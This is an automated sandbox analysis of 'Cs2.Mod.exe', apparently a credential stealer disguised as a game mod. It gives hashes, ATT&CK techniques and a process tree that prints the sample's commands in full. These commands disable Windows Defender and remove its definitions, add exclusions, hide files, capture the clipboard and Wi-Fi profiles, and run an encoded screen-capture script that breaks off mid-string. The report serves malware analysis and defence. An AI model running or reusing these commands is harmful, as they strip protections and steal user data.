ac0ab9e82b90540f095fdbb7ac351f84fdd1f1ffda5521de3633ffe9f36030b3

Analysis

max time kernel
141s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25/11/2024, 22:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Cs2.Mod.exe
Size

8.3MB
MD5

e8198192ac0c7fbb97eaf4e096afe978
SHA1

90b0bfb9c1ee5e2c518b30ecde3fc15a9a5f5218
SHA256

ac0ab9e82b90540f095fdbb7ac351f84fdd1f1ffda5521de3633ffe9f36030b3
SHA512

ad9aa6ccf83df6a296ad5d96f2b26b4347ae1892e2a2100a5dc108888f9f5b3f3e7fb1658a6e361631454e4c1759ee3188d7ca8e24dd380e7e9da5ac6852f135
SSDEEP

196608:GZuCoYVwfI9jUCzi4H1qSiXLGVi7DMgpZkrl7Q0VMwICEc/jk:fFIHziK1piXLGVE4UqC0VJo

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3124	powershell.exe
3716	powershell.exe
4844	powershell.exe
2696	powershell.exe
1852	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Cs2.Mod.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1752	cmd.exe
4336	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3780	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
4284	Cs2.Mod.exe
4284	Cs2.Mod.exe
4284	Cs2.Mod.exe
4284	Cs2.Mod.exe
4284	Cs2.Mod.exe
4284	Cs2.Mod.exe
4284	Cs2.Mod.exe
4284	Cs2.Mod.exe
4284	Cs2.Mod.exe
4284	Cs2.Mod.exe
4284	Cs2.Mod.exe
4284	Cs2.Mod.exe
4284	Cs2.Mod.exe
4284	Cs2.Mod.exe
4284	Cs2.Mod.exe
4284	Cs2.Mod.exe
4284	Cs2.Mod.exe
4284	Cs2.Mod.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
22	ip-api.com
7	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2440	tasklist.exe
3984	tasklist.exe
1132	tasklist.exe
4396	tasklist.exe
3680	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2664	cmd.exe

UPX packed file 45 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023ca8-62.dat	upx
behavioral2/memory/4284-66-0x00007FFE2E680000-0x00007FFE2ECE3000-memory.dmp	upx
behavioral2/files/0x0007000000023c75-69.dat	upx
behavioral2/memory/4284-71-0x00007FFE3E480000-0x00007FFE3E4A7000-memory.dmp	upx
behavioral2/files/0x0007000000023ca6-70.dat	upx
behavioral2/memory/4284-73-0x00007FFE43B10000-0x00007FFE43B1F000-memory.dmp	upx
behavioral2/files/0x0007000000023c7b-126.dat	upx
behavioral2/files/0x0007000000023c7a-125.dat	upx
behavioral2/files/0x0007000000023c79-124.dat	upx
behavioral2/files/0x0007000000023c78-123.dat	upx
behavioral2/files/0x0007000000023c77-122.dat	upx
behavioral2/files/0x0007000000023c76-121.dat	upx
behavioral2/files/0x0007000000023c74-120.dat	upx
behavioral2/files/0x0007000000023cae-119.dat	upx
behavioral2/files/0x0007000000023cac-118.dat	upx
behavioral2/files/0x0007000000023cab-117.dat	upx
behavioral2/files/0x0007000000023ca7-114.dat	upx
behavioral2/files/0x0007000000023ca5-113.dat	upx
behavioral2/memory/4284-131-0x00007FFE3E400000-0x00007FFE3E42B000-memory.dmp	upx
behavioral2/memory/4284-132-0x00007FFE42AD0000-0x00007FFE42AE9000-memory.dmp	upx
behavioral2/memory/4284-133-0x00007FFE3E3D0000-0x00007FFE3E3F5000-memory.dmp	upx
behavioral2/memory/4284-134-0x00007FFE2E340000-0x00007FFE2E4BF000-memory.dmp	upx
behavioral2/memory/4284-135-0x00007FFE42A30000-0x00007FFE42A49000-memory.dmp	upx
behavioral2/memory/4284-136-0x00007FFE43B00000-0x00007FFE43B0D000-memory.dmp	upx
behavioral2/memory/4284-137-0x00007FFE3DFF0000-0x00007FFE3E024000-memory.dmp	upx
behavioral2/memory/4284-139-0x00007FFE3A210000-0x00007FFE3A2DE000-memory.dmp	upx
behavioral2/memory/4284-138-0x00007FFE2E680000-0x00007FFE2ECE3000-memory.dmp	upx
behavioral2/memory/4284-142-0x00007FFE3E480000-0x00007FFE3E4A7000-memory.dmp	upx
behavioral2/memory/4284-140-0x00007FFE2DE00000-0x00007FFE2E333000-memory.dmp	upx
behavioral2/memory/4284-143-0x00007FFE3E060000-0x00007FFE3E074000-memory.dmp	upx
behavioral2/memory/4284-145-0x00007FFE42BF0000-0x00007FFE42BFD000-memory.dmp	upx
behavioral2/memory/4284-144-0x00007FFE3E400000-0x00007FFE3E42B000-memory.dmp	upx
behavioral2/memory/4284-147-0x00007FFE3D890000-0x00007FFE3D943000-memory.dmp	upx
behavioral2/memory/4284-146-0x00007FFE42AD0000-0x00007FFE42AE9000-memory.dmp	upx
behavioral2/memory/4284-171-0x00007FFE3E3D0000-0x00007FFE3E3F5000-memory.dmp	upx
behavioral2/memory/4284-172-0x00007FFE2E340000-0x00007FFE2E4BF000-memory.dmp	upx
behavioral2/memory/4284-186-0x00007FFE42A30000-0x00007FFE42A49000-memory.dmp	upx
behavioral2/memory/4284-338-0x00007FFE3DFF0000-0x00007FFE3E024000-memory.dmp	upx
behavioral2/memory/4284-350-0x00007FFE3A210000-0x00007FFE3A2DE000-memory.dmp	upx
behavioral2/memory/4284-351-0x00007FFE2DE00000-0x00007FFE2E333000-memory.dmp	upx
behavioral2/memory/4284-356-0x00007FFE3E060000-0x00007FFE3E074000-memory.dmp	upx
behavioral2/memory/4284-373-0x00007FFE2E340000-0x00007FFE2E4BF000-memory.dmp	upx
behavioral2/memory/4284-381-0x00007FFE3D890000-0x00007FFE3D943000-memory.dmp	upx
behavioral2/memory/4284-367-0x00007FFE2E680000-0x00007FFE2ECE3000-memory.dmp	upx
behavioral2/memory/4284-392-0x00007FFE2E680000-0x00007FFE2ECE3000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3368	cmd.exe
3648	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1576	WMIC.exe
2144	WMIC.exe
1892	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4904	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1852	powershell.exe
4844	powershell.exe
4844	powershell.exe
1852	powershell.exe
2696	powershell.exe
2696	powershell.exe
4336	powershell.exe
4336	powershell.exe
4332	powershell.exe
4332	powershell.exe
4336	powershell.exe
4332	powershell.exe
3124	powershell.exe
3124	powershell.exe
2920	powershell.exe
2920	powershell.exe
3716	powershell.exe
3716	powershell.exe
1988	powershell.exe
1988	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	400	WMIC.exe
Token: SeSecurityPrivilege	400	WMIC.exe
Token: SeTakeOwnershipPrivilege	400	WMIC.exe
Token: SeLoadDriverPrivilege	400	WMIC.exe
Token: SeSystemProfilePrivilege	400	WMIC.exe
Token: SeSystemtimePrivilege	400	WMIC.exe
Token: SeProfSingleProcessPrivilege	400	WMIC.exe
Token: SeIncBasePriorityPrivilege	400	WMIC.exe
Token: SeCreatePagefilePrivilege	400	WMIC.exe
Token: SeBackupPrivilege	400	WMIC.exe
Token: SeRestorePrivilege	400	WMIC.exe
Token: SeShutdownPrivilege	400	WMIC.exe
Token: SeDebugPrivilege	400	WMIC.exe
Token: SeSystemEnvironmentPrivilege	400	WMIC.exe
Token: SeRemoteShutdownPrivilege	400	WMIC.exe
Token: SeUndockPrivilege	400	WMIC.exe
Token: SeManageVolumePrivilege	400	WMIC.exe
Token: 33	400	WMIC.exe
Token: 34	400	WMIC.exe
Token: 35	400	WMIC.exe
Token: 36	400	WMIC.exe
Token: SeDebugPrivilege	4396	tasklist.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeIncreaseQuotaPrivilege	400	WMIC.exe
Token: SeSecurityPrivilege	400	WMIC.exe
Token: SeTakeOwnershipPrivilege	400	WMIC.exe
Token: SeLoadDriverPrivilege	400	WMIC.exe
Token: SeSystemProfilePrivilege	400	WMIC.exe
Token: SeSystemtimePrivilege	400	WMIC.exe
Token: SeProfSingleProcessPrivilege	400	WMIC.exe
Token: SeIncBasePriorityPrivilege	400	WMIC.exe
Token: SeCreatePagefilePrivilege	400	WMIC.exe
Token: SeBackupPrivilege	400	WMIC.exe
Token: SeRestorePrivilege	400	WMIC.exe
Token: SeShutdownPrivilege	400	WMIC.exe
Token: SeDebugPrivilege	400	WMIC.exe
Token: SeSystemEnvironmentPrivilege	400	WMIC.exe
Token: SeRemoteShutdownPrivilege	400	WMIC.exe
Token: SeUndockPrivilege	400	WMIC.exe
Token: SeManageVolumePrivilege	400	WMIC.exe
Token: 33	400	WMIC.exe
Token: 34	400	WMIC.exe
Token: 35	400	WMIC.exe
Token: 36	400	WMIC.exe
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeIncreaseQuotaPrivilege	1576	WMIC.exe
Token: SeSecurityPrivilege	1576	WMIC.exe
Token: SeTakeOwnershipPrivilege	1576	WMIC.exe
Token: SeLoadDriverPrivilege	1576	WMIC.exe
Token: SeSystemProfilePrivilege	1576	WMIC.exe
Token: SeSystemtimePrivilege	1576	WMIC.exe
Token: SeProfSingleProcessPrivilege	1576	WMIC.exe
Token: SeIncBasePriorityPrivilege	1576	WMIC.exe
Token: SeCreatePagefilePrivilege	1576	WMIC.exe
Token: SeBackupPrivilege	1576	WMIC.exe
Token: SeRestorePrivilege	1576	WMIC.exe
Token: SeShutdownPrivilege	1576	WMIC.exe
Token: SeDebugPrivilege	1576	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1576	WMIC.exe
Token: SeRemoteShutdownPrivilege	1576	WMIC.exe
Token: SeUndockPrivilege	1576	WMIC.exe
Token: SeManageVolumePrivilege	1576	WMIC.exe
Token: 33	1576	WMIC.exe
Token: 34	1576	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1684 wrote to memory of 4284	1684	Cs2.Mod.exe	83
PID 1684 wrote to memory of 4284	1684	Cs2.Mod.exe	83
PID 4284 wrote to memory of 2136	4284	Cs2.Mod.exe	84
PID 4284 wrote to memory of 2136	4284	Cs2.Mod.exe	84
PID 4284 wrote to memory of 3108	4284	Cs2.Mod.exe	85
PID 4284 wrote to memory of 3108	4284	Cs2.Mod.exe	85
PID 4284 wrote to memory of 3092	4284	Cs2.Mod.exe	86
PID 4284 wrote to memory of 3092	4284	Cs2.Mod.exe	86
PID 4284 wrote to memory of 1092	4284	Cs2.Mod.exe	90
PID 4284 wrote to memory of 1092	4284	Cs2.Mod.exe	90
PID 4284 wrote to memory of 792	4284	Cs2.Mod.exe	92
PID 4284 wrote to memory of 792	4284	Cs2.Mod.exe	92
PID 792 wrote to memory of 400	792	cmd.exe	95
PID 792 wrote to memory of 400	792	cmd.exe	95
PID 1092 wrote to memory of 4396	1092	cmd.exe	94
PID 1092 wrote to memory of 4396	1092	cmd.exe	94
PID 3108 wrote to memory of 4844	3108	cmd.exe	96
PID 3108 wrote to memory of 4844	3108	cmd.exe	96
PID 3092 wrote to memory of 4924	3092	cmd.exe	97
PID 3092 wrote to memory of 4924	3092	cmd.exe	97
PID 2136 wrote to memory of 1852	2136	cmd.exe	98
PID 2136 wrote to memory of 1852	2136	cmd.exe	98
PID 4284 wrote to memory of 1900	4284	Cs2.Mod.exe	100
PID 4284 wrote to memory of 1900	4284	Cs2.Mod.exe	100
PID 1900 wrote to memory of 2464	1900	cmd.exe	102
PID 1900 wrote to memory of 2464	1900	cmd.exe	102
PID 4284 wrote to memory of 3180	4284	Cs2.Mod.exe	103
PID 4284 wrote to memory of 3180	4284	Cs2.Mod.exe	103
PID 3180 wrote to memory of 1116	3180	cmd.exe	105
PID 3180 wrote to memory of 1116	3180	cmd.exe	105
PID 4284 wrote to memory of 4812	4284	Cs2.Mod.exe	106
PID 4284 wrote to memory of 4812	4284	Cs2.Mod.exe	106
PID 4812 wrote to memory of 1576	4812	cmd.exe	108
PID 4812 wrote to memory of 1576	4812	cmd.exe	108
PID 4284 wrote to memory of 4304	4284	Cs2.Mod.exe	109
PID 4284 wrote to memory of 4304	4284	Cs2.Mod.exe	109
PID 4304 wrote to memory of 2144	4304	cmd.exe	111
PID 4304 wrote to memory of 2144	4304	cmd.exe	111
PID 4284 wrote to memory of 2664	4284	Cs2.Mod.exe	112
PID 4284 wrote to memory of 2664	4284	Cs2.Mod.exe	112
PID 4284 wrote to memory of 3376	4284	Cs2.Mod.exe	114
PID 4284 wrote to memory of 3376	4284	Cs2.Mod.exe	114
PID 2664 wrote to memory of 4028	2664	cmd.exe	116
PID 2664 wrote to memory of 4028	2664	cmd.exe	116
PID 3376 wrote to memory of 2696	3376	cmd.exe	117
PID 3376 wrote to memory of 2696	3376	cmd.exe	117
PID 4284 wrote to memory of 2068	4284	Cs2.Mod.exe	120
PID 4284 wrote to memory of 2068	4284	Cs2.Mod.exe	120
PID 4284 wrote to memory of 4492	4284	Cs2.Mod.exe	119
PID 4284 wrote to memory of 4492	4284	Cs2.Mod.exe	119
PID 4284 wrote to memory of 4384	4284	Cs2.Mod.exe	123
PID 4284 wrote to memory of 4384	4284	Cs2.Mod.exe	123
PID 2068 wrote to memory of 3680	2068	cmd.exe	125
PID 2068 wrote to memory of 3680	2068	cmd.exe	125
PID 4492 wrote to memory of 2440	4492	cmd.exe	126
PID 4492 wrote to memory of 2440	4492	cmd.exe	126
PID 4384 wrote to memory of 2564	4384	cmd.exe	127
PID 4384 wrote to memory of 2564	4384	cmd.exe	127
PID 4284 wrote to memory of 1752	4284	Cs2.Mod.exe	128
PID 4284 wrote to memory of 1752	4284	Cs2.Mod.exe	128
PID 4284 wrote to memory of 1324	4284	Cs2.Mod.exe	130
PID 4284 wrote to memory of 1324	4284	Cs2.Mod.exe	130
PID 4284 wrote to memory of 5004	4284	Cs2.Mod.exe	132
PID 4284 wrote to memory of 5004	4284	Cs2.Mod.exe	132

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4028	attrib.exe
3516	attrib.exe
2208	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Cs2.Mod.exe
"C:\Users\Admin\AppData\Local\Temp\Cs2.Mod.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1684
- C:\Users\Admin\AppData\Local\Temp\Cs2.Mod.exe
  "C:\Users\Admin\AppData\Local\Temp\Cs2.Mod.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cs2.Mod.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cs2.Mod.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3108
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Ko sta', 0, 'Ko sta', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3092
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Ko sta', 0, 'Ko sta', 0+16);close()"
      4⤵
      PID:4924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1092
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:792
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1900
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3180
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4812
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4304
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Cs2.Mod.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:2664
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Cs2.Mod.exe"
      4⤵
      Views/modifies file attributes
      PID:4028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3376
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4492
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2068
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4384
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1324
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5004
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3368
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4604
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1868
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgA